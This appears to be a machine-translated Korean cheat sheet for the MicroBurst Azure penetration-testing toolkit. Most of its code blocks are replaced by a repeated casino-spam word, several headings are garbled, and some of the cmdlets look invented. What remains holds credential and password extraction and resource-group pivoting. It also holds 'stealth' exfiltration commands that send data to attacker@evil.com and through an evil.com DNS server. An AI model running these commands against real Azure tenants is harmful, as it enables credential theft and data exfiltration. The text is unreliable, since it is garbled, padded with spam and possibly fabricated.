MicroBurst Azure 보안 테스트 툴킷 열 시트
제품정보
MicroBurst는 Microsoft Azure 보안을 평가하기위한 NetSPI에 의해 개발 된 PowerShell 스크립트 모음입니다. Azure 서비스 발견, 특권 에스컬레이션, 측면 운동 및 데이터 여과에 대한 도구가 포함되어 있습니다. Azure 침투 테스트를 위한 종합 툴킷.
· ** 보증**: 이 도구는 공인된 침투 테스트 및 보안 평가에만 적용됩니다. 모든 환경에서 사용하기 전에 적절한 권한이 있습니다.
설치하기
PowerShell 갤러리 설치
카지노사이트
수동 설치
카지노사이트
Git 설치
카지노사이트
기본 사용
모듈 설정
카지노사이트
인증현황
카지노사이트
명령 참조
Reconnaissance 기능
| | Function | Description | |
| --- | --- |
| | Invoke-EnumerateAzureBlobs | Enumerate Azure storage blobs | |
| | Invoke-EnumerateAzureSubDomains | Enumerate Azure subdomains | |
| | Get-AzurePasswords | Extract passwords from Azure resources | |
| | Get-AzureDomainInfo | Get domain information | |
| | Invoke-AzureRmVmBulkCMD | Execute commands on multiple VMs | |
저장 계정 기능
| | Function | Description | |
| --- | --- |
| | Invoke-EnumerateAzureBlobs | Find accessible storage blobs | |
| | Get-AzureBlobFiles | Download files from storage | |
| | Invoke-AzureStorageAccountEnum | Enumerate storage accounts | |
| | Get-AzureStorageAccountKeys | Extract storage account keys | |
가상 머신 기능
| | Function | Description | |
| --- | --- |
| | Invoke-AzureRmVmBulkCMD | Bulk command execution | |
| | Get-AzureVMDisk | Access VM disk information | |
| | Invoke-AzureVMUserDataEnum | Enumerate VM user data | |
| | Get-AzureVMExtensionSettings | Get VM extension settings | |
Azure 스토리지
Blob 스토리지 디스커버리
카지노사이트
저장 계정 Enumeration
카지노사이트
파일 공유 Enumeration
카지노사이트
Subdomain 및 서비스 디스커버리
Azure Subdomain 사용
카지노사이트
서비스 Discovery
카지노사이트
DNS 환경
ο 회원 관리
가상 머신 폭발
VM 명령 실행
카지노사이트
VM 디스크 액세스
카지노사이트
VM 연장 폭발
카지노사이트
Credential 및 비밀 추출
비밀번호 추출
카지노사이트
인증서 추출
카지노사이트
제품 설명 데이터 추출
카지노사이트
데이터베이스 Exploitation
SQL 데이터베이스
카지노사이트
SQL 데이터베이스 액세스
카지노사이트
CosmosDB 폭발
오프화이트
웹 신청 Exploitation
웹 앱 축소
카지노사이트
웹 앱 평가
오프화이트
기능 앱 평가
카지노사이트
Privilege 확장
역할 할당
카지노사이트
서비스 Principal 뚱 베어
카지노사이트
관리 Identity 폭발
카지노사이트
옆 운동
크로스 구독 오시는 길
카지노사이트
Cross-Tenant 액세스
카지노사이트
리소스 그룹 Pivoting
```powershell
Enumerate resource groups
Get-AzureResourceGroups -SubscriptionId "subscription-id"
Find resources with weak permissions
Find-AzureWeakPermissions -ResourceGroupName "rg-name"
Pivot through resource groups
Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg" ```의 경우
자료 Exfiltration
대량 데이터 추출
```powershell
Extract all accessible data
Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"
Extract specific data types
Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"
Extract with compression
Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress ```에 대하여
스텔스 Exfiltration
```powershell
Exfiltrate via storage account
Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"
Exfiltrate via email
Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"
Exfiltrate via DNS
Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com" ```의 경우
자동화 및 스크립트
자동화된 평가 스크립트
```powershell
Comprehensive Azure assessment
param( [string]$SubscriptionId, [string]$OutputPath = "C:\AzureAssessment" )
Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force
Authenticate
Connect-AzAccount
Set subscription context
Set-AzContext -SubscriptionId $SubscriptionId
Enumerate subdomains
Write-Host "Enumerating subdomains..." $subdomains = Invoke-EnumerateAzureSubDomains -Base (Get-AzContext).Subscription.Name $subdomains|Out-File "$OutputPath\subdomains.txt"
Enumerate storage blobs
Write-Host "Enumerating storage blobs..." $blobs = Invoke-EnumerateAzureBlobs -Base (Get-AzContext).Subscription.Name $blobs|Out-File "$OutputPath\blobs.txt"
Extract passwords
Write-Host "Extracting passwords..." $passwords = Get-AzurePasswords -SubscriptionId $SubscriptionId $passwords|Export-Csv "$OutputPath\passwords.csv" -NoTypeInformation
Get VM information
Write-Host "Gathering VM information..." $vms = Get-AzVM $vms|Export-Csv "$OutputPath\vms.csv" -NoTypeInformation
Generate summary report
$summary = @\\{ AssessmentDate = Get-Date SubscriptionId = $SubscriptionId SubdomainsFound = $subdomains.Count BlobsFound = $blobs.Count PasswordsFound = $passwords.Count VMsFound = $vms.Count \\}
| $summary | ConvertTo-Json | Out-File "$OutputPath\summary.json" |
Write-Host "Assessment completed. Results saved to $OutputPath" ```에 대하여
연속 모니터링
```powershell
Continuous Azure monitoring
param( [int]$IntervalMinutes = 60, [string]$LogPath = "C:\AzureMonitoring\monitor.log" )
while ($true) \\{ $timestamp = Get-Date Write-Output "[$timestamp] Starting Azure monitoring cycle"|Tee-Object -FilePath $LogPath -Append
try \\\\{
# Check for new storage accounts
$newStorage = Get-AzStorageAccount|Where-Object \\\\{$_.CreationTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newStorage) \\\\{
Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new VMs
$newVMs = Get-AzVM|Where-Object \\\\{$_.TimeCreated -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newVMs) \\\\{
Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new role assignments
$newRoles = Get-AzRoleAssignment|Where-Object \\\\{$_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newRoles) \\\\{
Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
\\\\}
catch \\\\{
Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)"|Tee-Object -FilePath $LogPath -Append
\\\\}
Start-Sleep -Seconds ($IntervalMinutes * 60)
\\} ```의 경우
문제 해결
인증 문제
카지노사이트
모듈 문제
카지노사이트
제출 문제
카지노사이트
다른 도구와 통합
BloodHound 통합
카지노사이트
Metasploit 통합
카지노사이트
지원하다
이 속임수 시트는 MicroBurst를 사용하여 포괄적 인 참조를 제공합니다. 항상 Azure 보안 평가를 수행하기 전에 적절한 권한이 있습니다. 필수